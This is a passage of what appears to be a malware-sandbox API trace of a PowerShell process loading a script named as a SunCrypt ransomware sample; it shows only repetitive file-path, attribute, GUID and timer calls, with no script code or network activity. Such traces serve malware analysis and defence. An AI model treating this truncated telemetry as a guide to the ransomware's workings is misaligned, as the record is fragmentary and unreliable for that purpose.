lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0102.359] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0102.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.362] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701517887054) returned 1 [0102.426] EtwEventActivityIdControl () returned 0x0 [0102.430] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x4297ac38, Data2=0xa849, Data3=0x4b04, Data4=([0]=0xb9, [1]=0x33, [2]=0xf6, [3]=0xb6, [4]=0xff, [5]=0xf1, [6]=0xf, [7]=0xe9))) returned 0x0 [0102.430] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.430] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.430] CoTaskMemFree (pv=0x4280e80) [0102.430] EtwEventActivityIdControl () returned 0x0 [0102.430] EtwEventActivityIdControl () returned 0x0 [0102.430] EtwEventActivityIdControl () returned 0x0 [0102.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0102.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0102.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.004] EtwEventActivityIdControl () returned 0x0 [0103.040] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x5a032eb0, Data2=0x2814, Data3=0x46ec, Data4=([0]=0x84, [1]=0xe4, [2]=0x28, [3]=0x8b, [4]=0x26, [5]=0xb9, [6]=0xe4, [7]=0x38))) returned 0x0 [0103.041] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.041] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.041] CoTaskMemFree (pv=0x4280e80) [0103.041] EtwEventActivityIdControl () returned 0x0 [0103.041] EtwEventActivityIdControl () returned 0x0 [0103.041] EtwEventActivityIdControl () returned 0x0 [0103.042] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701585854404) returned 1 [0103.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0103.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0103.043] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.043] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.046] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701586232856) returned 1 [0103.078] EtwEventActivityIdControl () returned 0x0 [0103.169] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x8d797e0a, Data2=0xe752, Data3=0x44d4, Data4=([0]=0x83, [1]=0xbd, [2]=0x1f, [3]=0x1f, [4]=0x35, [5]=0xa0, [6]=0xdb, [7]=0x71))) returned 0x0 [0103.169] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.169] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.169] CoTaskMemFree (pv=0x4280e80) [0103.169] EtwEventActivityIdControl () returned 0x0 [0103.169] EtwEventActivityIdControl () returned 0x0 [0103.169] EtwEventActivityIdControl () returned 0x0 [0103.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0103.170] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0103.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.263] EtwEventActivityIdControl () returned 0x0 [0103.286] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x6114482, Data2=0x167, Data3=0x4004, Data4=([0]=0x9c, [1]=0x16, [2]=0x64, [3]=0x89, [4]=0x51, [5]=0xef, [6]=0xba, [7]=0x9a))) returned 0x0 [0103.286] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.286] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.286] CoTaskMemFree (pv=0x4280e80) [0103.286] EtwEventActivityIdControl () returned 0x0 [0103.287] EtwEventActivityIdControl () returned 0x0 [0103.287] EtwEventActivityIdControl () returned 0x0 [0103.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0103.287] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0103.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.364] EtwEventActivityIdControl () returned 0x0 [0103.371] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x516a21f7, Data2=0x9538, Data3=0x4e79, Data4=([0]=0x8f, [1]=0x7b, [2]=0x79, [3]=0xc5, [4]=0x85, [5]=0xfb, [6]=0xcd, [7]=0x25))) returned 0x0 [0103.372] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.372] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.372] CoTaskMemFree (pv=0x4280e80) [0103.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.372] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.379] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701619559550) returned 1 [0103.379] EtwEventActivityIdControl () returned 0x0 [0103.379] EtwEventActivityIdControl () returned 0x0 [0103.379] EtwEventActivityIdControl () returned 0x0 [0103.379] EtwEventActivityIdControl () returned 0x0 [0103.380] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xefd6b436, Data2=0x9660, Data3=0x4570, Data4=([0]=0xbb, [1]=0xfa, [2]=0x2c, [3]=0x3b, [4]=0xe0, [5]=0x5e, [6]=0x7, [7]=0xd))) returned 0x0 [0103.380] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.380] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.380] CoTaskMemFree (pv=0x4280e80) [0103.380] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701619707252) returned 1 [0103.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.381] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.383] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701619946660) returned 1 [0103.383] EtwEventActivityIdControl () returned 0x0 [0103.383] EtwEventActivityIdControl () returned 0x0 [0103.383] EtwEventActivityIdControl () returned 0x0 [0103.383] EtwEventActivityIdControl () returned 0x0 [0103.383] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2add78df, Data2=0x4a34, Data3=0x4a92, Data4=([0]=0xb5, [1]=0xb8, [2]=0x44, [3]=0xa6, [4]=0x8e, [5]=0x65, [6]=0xb2, [7]=0xed))) returned 0x0 [0103.384] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.384] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.384] CoTaskMemFree (pv=0x4280e80) [0103.384] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701620072859) returned 1 [0103.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.384] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.385] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.385] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.388] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701621218640) returned 1 [0103.396] EtwEventActivityIdControl () returned 0x0 [0103.396] EtwEventActivityIdControl () returned 0x0 [0103.396] EtwEventActivityIdControl () returned 0x0 [0103.396] EtwEventActivityIdControl () returned 0x0 [0103.396] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2d4de5a1, Data2=0x57cd, Data3=0x42ab, Data4=([0]=0x9d, [1]=0xeb, [2]=0x2, [3]=0xff, [4]=0x3c, [5]=0x7, [6]=0xce, [7]=0x1e))) returned 0x0 [0103.396] CoTaskMemAlloc (cb=0x2d4) returned 0x428fc98 [0103.396] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x428fc98, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.397] CoTaskMemFree (pv=0x428fc98) [0103.397] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701621335489) returned 1 [0103.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.406] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701622217052) returned 1 [0103.406] EtwEventActivityIdControl () returned 0x0 [0103.406] EtwEventActivityIdControl () returned 0x0 [0103.406] EtwEventActivityIdControl () returned 0x0 [0103.406] EtwEventActivityIdControl () returned 0x0 [0103.406] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xd86e6ff8, Data2=0x721d, Data3=0x4070, Data4=([0]=0xb6, [1]=0x2b, [2]=0x5e, [3]=0x54, [4]=0x19, [5]=0xc, [6]=0x4b, [7]=0xbe))) returned 0x0 [0103.407] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.407] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701622357328) returned 1 [0103.407] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.407] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.407] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: 